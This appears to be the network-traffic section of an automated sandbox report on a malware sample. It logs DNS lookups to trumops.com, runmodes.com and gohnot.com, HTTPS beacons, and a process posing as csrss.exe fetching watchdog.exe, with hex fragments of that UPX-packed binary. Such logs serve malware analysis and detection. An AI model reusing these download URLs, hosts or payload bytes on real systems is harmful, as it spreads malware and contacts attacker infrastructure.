                                                            Oct 20, 2021 12:39:12.103018045 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103049040 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103053093 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103056908 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103060007 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103063107 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103065968 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103069067 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103071928 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103074074 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103076935 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103080034 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103082895 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103085041 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103087902 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103090048 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103092909 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103095055 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103097916 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.103100061 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.193455935 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:13.644731998 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:18.955210924 CEST49768443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:39:18.955269098 CEST44349768104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:39:18.955437899 CEST49768443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:39:18.962169886 CEST49768443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:39:18.962219954 CEST44349768104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:39:19.002413034 CEST44349768104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:39:19.009293079 CEST49768443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:39:19.009325981 CEST44349768104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:39:19.010288000 CEST49768443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:39:19.010308981 CEST44349768104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:39:19.012573957 CEST44349768104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:39:19.012661934 CEST49768443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:39:19.039839983 CEST49768443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:39:19.040020943 CEST44349768104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:39:19.040080070 CEST49768443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:39:19.083139896 CEST44349768104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:39:19.084059954 CEST44349768104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:39:19.084158897 CEST49768443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:39:19.086263895 CEST49768443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:39:19.086294889 CEST44349768104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:39:19.086308002 CEST49768443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:39:19.086316109 CEST44349768104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:39:42.113886118 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:42.130628109 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:42.866487980 CEST49771443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:39:42.866533041 CEST44349771172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:39:42.866631031 CEST49771443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:39:42.868834972 CEST49771443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:39:42.868859053 CEST44349771172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:39:42.911603928 CEST44349771172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:39:42.912358999 CEST49771443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:39:42.912390947 CEST44349771172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:39:42.913000107 CEST49771443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:39:42.913008928 CEST44349771172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:39:42.914813042 CEST44349771172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:39:42.914901018 CEST49771443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:39:42.923434019 CEST49771443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:39:42.923645020 CEST44349771172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:39:42.923830032 CEST49771443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:39:42.923846006 CEST44349771172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:39:42.972666979 CEST49771443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:39:42.983525991 CEST44349771172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:39:42.983633995 CEST44349771172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:39:42.983702898 CEST49771443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:39:42.986537933 CEST49771443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:39:42.986563921 CEST44349771172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:39:42.986582994 CEST49771443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:39:42.986592054 CEST44349771172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:40:12.146898985 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:40:12.162978888 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:40:42.173748970 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:40:42.189707041 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:40:43.629261017 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:40:43.645715952 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:40:43.646579981 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:41:01.057307959 CEST49855443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:41:01.057359934 CEST44349855172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:41:01.057456017 CEST49855443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:41:01.058979034 CEST49855443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:41:01.059005022 CEST44349855172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:41:01.102989912 CEST44349855172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:41:01.104027033 CEST49855443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:41:01.104051113 CEST44349855172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:41:01.104747057 CEST49855443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:41:01.104762077 CEST44349855172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:41:01.106720924 CEST44349855172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:41:01.108829975 CEST49855443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:41:01.108841896 CEST49855443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:41:01.109009027 CEST44349855172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:41:01.109208107 CEST49855443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:41:01.151165962 CEST44349855172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:41:01.158302069 CEST49855443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:41:01.158324003 CEST44349855172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:41:01.208365917 CEST49855443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:41:01.217649937 CEST44349855172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:41:01.217775106 CEST44349855172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:41:01.217871904 CEST49855443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:41:01.218187094 CEST49855443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:41:01.218205929 CEST44349855172.67.139.144192.168.2.6
                                                            Oct 20, 2021 12:41:01.218218088 CEST49855443192.168.2.6172.67.139.144
                                                            Oct 20, 2021 12:41:01.218225956 CEST44349855172.67.139.144192.168.2.6

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 20, 2021 12:38:52.233896017 CEST5507453192.168.2.68.8.8.8
                                                            Oct 20, 2021 12:38:52.254411936 CEST53550748.8.8.8192.168.2.6
                                                            Oct 20, 2021 12:38:52.260442972 CEST5451353192.168.2.68.8.8.8
                                                            Oct 20, 2021 12:38:52.281461000 CEST53545138.8.8.8192.168.2.6
                                                            Oct 20, 2021 12:38:52.286421061 CEST6204453192.168.2.68.8.8.8
                                                            Oct 20, 2021 12:38:52.309148073 CEST53620448.8.8.8192.168.2.6
                                                            Oct 20, 2021 12:38:52.349601030 CEST6379153192.168.2.68.8.8.8
                                                            Oct 20, 2021 12:38:52.370346069 CEST53637918.8.8.8192.168.2.6
                                                            Oct 20, 2021 12:38:52.519624949 CEST6426753192.168.2.68.8.8.8
                                                            Oct 20, 2021 12:38:52.538857937 CEST53642678.8.8.8192.168.2.6
                                                            Oct 20, 2021 12:38:56.621659994 CEST4944853192.168.2.68.8.8.8
                                                            Oct 20, 2021 12:38:56.639914036 CEST53494488.8.8.8192.168.2.6
                                                            Oct 20, 2021 12:38:57.825361967 CEST6034253192.168.2.68.8.8.8
                                                            Oct 20, 2021 12:38:57.846230030 CEST53603428.8.8.8192.168.2.6
                                                            Oct 20, 2021 12:39:11.577914953 CEST5838453192.168.2.68.8.8.8
                                                            Oct 20, 2021 12:39:11.599297047 CEST53583848.8.8.8192.168.2.6
                                                            Oct 20, 2021 12:39:11.718786001 CEST5606153192.168.2.68.8.8.8
                                                            Oct 20, 2021 12:39:11.736885071 CEST53560618.8.8.8192.168.2.6
                                                            Oct 20, 2021 12:39:13.665689945 CEST5833653192.168.2.68.8.8.8
                                                            Oct 20, 2021 12:39:13.686454058 CEST53583368.8.8.8192.168.2.6
                                                            Oct 20, 2021 12:39:18.899579048 CEST5378153192.168.2.68.8.8.8
                                                            Oct 20, 2021 12:39:18.919198036 CEST53537818.8.8.8192.168.2.6
                                                            Oct 20, 2021 12:39:42.796056032 CEST5529953192.168.2.68.8.8.8
                                                            Oct 20, 2021 12:39:42.814599037 CEST53552998.8.8.8192.168.2.6
                                                            Oct 20, 2021 12:41:01.037570953 CEST6402153192.168.2.68.8.8.8
                                                            Oct 20, 2021 12:41:01.056124926 CEST53640218.8.8.8192.168.2.6

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Oct 20, 2021 12:38:52.233896017 CEST192.168.2.68.8.8.80xb8d1Standard query (0)trumops.com16IN (0x0001)
                                                            Oct 20, 2021 12:38:52.260442972 CEST192.168.2.68.8.8.80x2d77Standard query (0)logs.trumops.com16IN (0x0001)
                                                            Oct 20, 2021 12:38:52.286421061 CEST192.168.2.68.8.8.80x6503Standard query (0)8cf49c60-c834-48e4-bacd-9cc30e6a4460.uuid.trumops.com16IN (0x0001)
                                                            Oct 20, 2021 12:38:52.349601030 CEST192.168.2.68.8.8.80xdba7Standard query (0)runmodes.comA (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:38:52.519624949 CEST192.168.2.68.8.8.80x9115Standard query (0)server12.trumops.comA (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:38:56.621659994 CEST192.168.2.68.8.8.80x4df5Standard query (0)runmodes.comA (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:38:57.825361967 CEST192.168.2.68.8.8.80x38f3Standard query (0)server12.trumops.comA (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:39:11.577914953 CEST192.168.2.68.8.8.80xdf1cStandard query (0)server12.trumops.comA (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:39:11.718786001 CEST192.168.2.68.8.8.80x6367Standard query (0)gohnot.comA (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:39:13.665689945 CEST192.168.2.68.8.8.80xe3f4Standard query (0)e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com16IN (0x0001)
                                                            Oct 20, 2021 12:39:18.899579048 CEST192.168.2.68.8.8.80x3dceStandard query (0)runmodes.comA (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:39:42.796056032 CEST192.168.2.68.8.8.80x7ab0Standard query (0)server12.trumops.comA (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:41:01.037570953 CEST192.168.2.68.8.8.80x8871Standard query (0)server12.trumops.comA (IP address)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Oct 20, 2021 12:38:52.254411936 CEST8.8.8.8192.168.2.60xb8d1No error (0)trumops.comTXT (Text strings)IN (0x0001)
                                                            Oct 20, 2021 12:38:52.281461000 CEST8.8.8.8192.168.2.60x2d77No error (0)logs.trumops.comTXT (Text strings)IN (0x0001)
                                                            Oct 20, 2021 12:38:52.309148073 CEST8.8.8.8192.168.2.60x6503Name error (3)8cf49c60-c834-48e4-bacd-9cc30e6a4460.uuid.trumops.comnonenone16IN (0x0001)
                                                            Oct 20, 2021 12:38:52.370346069 CEST8.8.8.8192.168.2.60xdba7No error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:38:52.370346069 CEST8.8.8.8192.168.2.60xdba7No error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:38:52.538857937 CEST8.8.8.8192.168.2.60x9115No error (0)server12.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:38:52.538857937 CEST8.8.8.8192.168.2.60x9115No error (0)server12.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:38:56.639914036 CEST8.8.8.8192.168.2.60x4df5No error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:38:56.639914036 CEST8.8.8.8192.168.2.60x4df5No error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:38:57.846230030 CEST8.8.8.8192.168.2.60x38f3No error (0)server12.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:38:57.846230030 CEST8.8.8.8192.168.2.60x38f3No error (0)server12.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:39:11.599297047 CEST8.8.8.8192.168.2.60xdf1cNo error (0)server12.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:39:11.599297047 CEST8.8.8.8192.168.2.60xdf1cNo error (0)server12.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:39:11.736885071 CEST8.8.8.8192.168.2.60x6367No error (0)gohnot.com104.21.92.165A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:39:11.736885071 CEST8.8.8.8192.168.2.60x6367No error (0)gohnot.com172.67.196.11A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:39:13.686454058 CEST8.8.8.8192.168.2.60xe3f4No error (0)e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.comTXT (Text strings)IN (0x0001)
                                                            Oct 20, 2021 12:39:18.919198036 CEST8.8.8.8192.168.2.60x3dceNo error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:39:18.919198036 CEST8.8.8.8192.168.2.60x3dceNo error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:39:42.814599037 CEST8.8.8.8192.168.2.60x7ab0No error (0)server12.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:39:42.814599037 CEST8.8.8.8192.168.2.60x7ab0No error (0)server12.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:41:01.056124926 CEST8.8.8.8192.168.2.60x8871No error (0)server12.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                            Oct 20, 2021 12:41:01.056124926 CEST8.8.8.8192.168.2.60x8871No error (0)server12.trumops.com104.21.79.9A (IP address)IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • runmodes.com
                                                            • server12.trumops.com
                                                            • gohnot.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.649754104.21.34.203443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.649755104.21.79.9443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.649756104.21.34.203443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.2.649757172.67.139.144443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4192.168.2.649764172.67.139.144443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5192.168.2.649768104.21.34.203443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6192.168.2.649771172.67.139.144443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7192.168.2.649855172.67.139.144443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8192.168.2.649767104.21.92.16580C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 20, 2021 12:39:11.755803108 CEST1237OUTGET /0281c43f36eb9f47aab5357d48bbc076/watchdog.exe HTTP/1.1
                                                            Host: gohnot.com
                                                            User-Agent: Go-http-client/1.1
                                                            Uuid: 8cf49c60-c834-48e4-bacd-9cc30e6a4460
                                                            Version: 183
                                                            Accept-Encoding: gzip
                                                            Oct 20, 2021 12:39:11.789946079 CEST1246INHTTP/1.1 200 OK
                                                            Date: Wed, 20 Oct 2021 10:39:11 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 2102272
                                                            Connection: keep-alive
                                                            content-disposition: attachment; filename=watchdog.exe
                                                            etag: "616ea494-201400"
                                                            last-modified: Tue, 19 Oct 2021 10:57:24 GMT
                                                            Cache-Control: max-age=3600
                                                            CF-Cache-Status: HIT
                                                            Age: 2344
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=um4jgmu5MJYrCALOja4WSnT%2BKIqMmUbFD6XsWL2Jk3lxPjw2VqysVmcC9mrM%2BGwFqp0T%2Bv78FIyQfHnQlthqFSIsBnaG1oJt9USn6g%2BEBiwQGd5bp0SiF0DtnQnx"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Vary: Accept-Encoding
                                                            Server: cloudflare
                                                            CF-RAY: 6a119ef28d8f68f2-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M
                                                            Oct 20, 2021 12:39:11.789983988 CEST1247INData Raw: 00 00 40 00 00 c0 33 2e 39 35 00 55 50 58 21 0d 09 08 09 59 97 50 98 0e ef ba a0 1e 64 4d 00 e9 0c 20 00 00 b6 4b 00 26 27 00 ab ff ff ff ff ff 20 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 38 4c 67 64 4e 77 31 30 4f 4d 6e 6a 6e 45 61 66 ff ff 6f
                                                            Data Ascii: @3.95UPX!YPdM K&' Go build ID: "8LgdNw10OMnjnEafoouob/F_u>d7bw5LzGyMt067q/f_4En-IIykrT4Xu-NukD/RUnzYHIbGfj1LuaRla" d;av 'D$$`k&fdnlL$hm
                                                            Oct 20, 2021 12:39:11.790003061 CEST1248INData Raw: 3e 28 c3 88 c1 57 72 50 84 1b b4 07 0c a9 08 71 3f 90 7d de 6c e4 a9 20 1b f8 1b 21 df ad c0 e2 ca 88 15 bb fa 01 45 e5 1b 02 8f 10 2c 27 e6 95 4d 43 db 5d 39 d9 18 20 bb 9c 8b e2 a9 2b 74 90 61 97 52 a9 04 39 28 20 64 b1 3b 7a f8 08 aa b4 f3 57
                                                            Data Ascii: >(WrPq?}l !E,'MC]9 +taR9( d;zW=59ky,.@yi-(8HXh:xI.>!$2erxHj!pTq60#.?WD8kmNq_VN]SY?.7
                                                            Oct 20, 2021 12:39:11.790019989 CEST1250INData Raw: b6 d9 a7 f0 bf 42 a2 88 a0 57 c9 0f 2e c1 75 06 0f 8b 86 02 97 f6 1f 1a 2e c0 75 02 7b 5b 6a 05 80 dd 13 76 df 41 40 18 8b 88 90 11 90 94 e4 90 17 89 fb ff 5f f5 cb c1 e1 11 e4 89 d3 31 ca c1 e9 07 31 d1 89 da c1 eb 10 31 cb 89 98 45 c1 ff 37 b8
                                                            Data Ascii: BW.u.u{[jvA@_111E7M15ivEbxVsAuF&(fQ2f<c'9({'~7-E!2r5X*>- tgIfY^I t)1wxMeY!(@
                                                            Oct 20, 2021 12:39:11.790038109 CEST1251INData Raw: 50 1f 9a 57 c1 a8 d6 44 6d 1a 60 3e 6c 8d 1f c2 2d 70 2a 0b 02 8a ac 64 ab 33 3e 1e 66 67 70 a0 8b 4f f0 72 e4 ad 40 7f 5e 23 01 7e 30 b8 97 20 ed 79 ef 40 76 23 0e 4c 30 87 d1 47 e6 13 60 7f 40 ae 1c 83 c0 ac b0 02 66 2a 0a f0 14 b9 e8 a8 44 9d
                                                            Data Ascii: PWDm`>l-p*d3>fgpOr@^#~0 y@v#L0G`@f*DT+o0BqGt4;=&:%HId,fQlba0RlLp)-pKhxp$BA9M49L{^pA,}b?1DI'\8"?v>ehxAx
                                                            Oct 20, 2021 12:39:11.790055037 CEST1252INData Raw: 58 24 19 12 4d a8 ca 28 a6 e9 13 ae 78 fc a1 40 44 e8 09 83 c3 0c a4 52 fd 8b 7b fd 4b e0 1b fa 17 77 2d 8b 3f b4 01 fd 39 fa 76 1d fc ff 1f e8 f0 28 ce 29 fd 29 fa 39 e9 76 09 46 29 e9 39 c6 7c cd eb a8 8c 8b 83 1f 37 d7 eb df 0c 38 18 20 05 ff
                                                            Data Ascii: X$M(x@DR{Kw-?9v())9vF)9|78 L`0|4<$lCuL$)80@&)4D<-z80.btQL_a%I=z?[H,y@c$70i?Y(6-p*TY8Y7>lEz*P89Pf
                                                            Oct 20, 2021 12:39:11.790074110 CEST1254INData Raw: b7 01 06 9c 49 38 85 a3 c2 00 d5 20 13 62 24 46 f8 05 01 bc ee ff be 02 23 d8 df f8 20 89 5c 24 04 14 32 32 c1 df 20 10 b0 92 b2 62 be 19 02 2b 23 0c 80 06 19 f1 32 f5 0b 5c 31 49 14 1c f5 af cf 6e 81 84 46 10 bb df eb 11 90 70 16 17 2c 60 26 51
                                                            Data Ascii: I8 b$F# \$22 b+#2\1InFp,`&QXYM9Q!uSP`GCJ#i`DF@'O[EJBBJKP07pl!A#?A(#:tx^G\2Dp%B*X3GZH
                                                            Oct 20, 2021 12:39:11.790096998 CEST1255INData Raw: 7f b3 b1 e1 e9 7e 76 f4 3c 2e 32 3d 97 74 28 31 ff 97 ff 0b de 14 72 0e d8 8d 45 01 68 77 74 29 c1 89 ca f7 d9 c1 f9 06 d2 3b f8 1f 21 c8 01 f0 30 34 9e 38 97 57 c0 41 4e f1 a0 22 34 60 20 58 01 03 f3 5c 21 bc 6a 7f 6c 05 46 c6 7c 24 10 16 1c 60
                                                            Data Ascii: ~v<.2=t(1rEhwt);!048WAN"4` X\!jlF|$`*$)ZYq!+E|4tE_q_/]Kj hB9sG4V8?(ArZw ArkZ GX+\P ;A*\F1$",V3<
                                                            Oct 20, 2021 12:39:11.790113926 CEST1257INData Raw: c6 52 c0 cb 94 cb 6c b8 e0 01 94 16 a3 a0 5a 89 c2 ad a4 5e d1 9b 3d ea eb f1 89 f8 e3 d3 88 07 9c 0d b9 08 4f 27 4d 5e 87 2a 8d ac df 93 07 9f ff f7 00 bc 78 f0 7c 3e 5f 1c 8b 48 08 81 f9 6d 54 1a 6c ff 88 ae b3 3e e9 72 f9 8c 02 25 79 16 29 02
                                                            Data Ascii: RlZ^=O'M^*x|>_HmTl>r%y)W6.=j+E9'O"ku\VR>IJ*bVm>p kt=FB3hy?(hFSx;?Y|%Ux$: \GWx?PrO#I
                                                            Oct 20, 2021 12:39:11.790133953 CEST1258INData Raw: 44 68 63 70 0a 6f 76 c7 47 b3 47 6f 5b e2 b7 b5 d6 76 c5 0f 2c 10 00 3b 14 02 bd 49 38 46 1d 47 54 75 45 89 47 a3 23 f3 af fa 3c 8e 03 f0 fc 8d 74 24 34 19 f0 d6 54 42 68 3d 44 1e 5c 7c 31 06 dc d4 64 89 4c 55 85 b0 02 32 32 3e 85 db d9 48 45 b4
                                                            Data Ascii: DhcpovGGo[v,;I8FGTuEG#<t$4TBh=D\|1dLU22>HEt\O8f06pWdhwjlptF[/C +U(KLmq'0'tp(#'I07E|(,3Wl/LT_AJGgR_K@~d
                                                            Oct 20, 2021 12:39:11.790150881 CEST1260INData Raw: f0 7a 30 e4 0f 84 d5 0a 5a 12 ed 09 e8 12 77 d4 d8 44 7d 57 25 46 89 dc 2d fb 1f 03 1f 70 80 25 44 0f b6 12 f6 c2 01 1e 81 7b 9c 52 3f 8f 75 09 99 8c 48 19 7e ec 66 2b f3 44 01 08 8b 57 02 9b 01 9c 9d 85 8c 71 90 49 d8 e3 06 db c3 71 01 07 84 c2
                                                            Data Ascii: z0ZwD}W%F-p%D{R?uH~f+DWqIq&PciQi8pD3J02,\aHDJ# p_ DT.P<?8tfXg,\wg9t1i1OCTC5
                                                            Oct 20, 2021 12:39:42.113886118 CEST3458OUTData Raw: 00
                                                            Data Ascii:
                                                            Oct 20, 2021 12:40:12.146898985 CEST10117OUTData Raw: 00
                                                            Data Ascii:
                                                            Oct 20, 2021 12:40:42.173748970 CEST10202OUTData Raw: 00
                                                            Data Ascii:


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
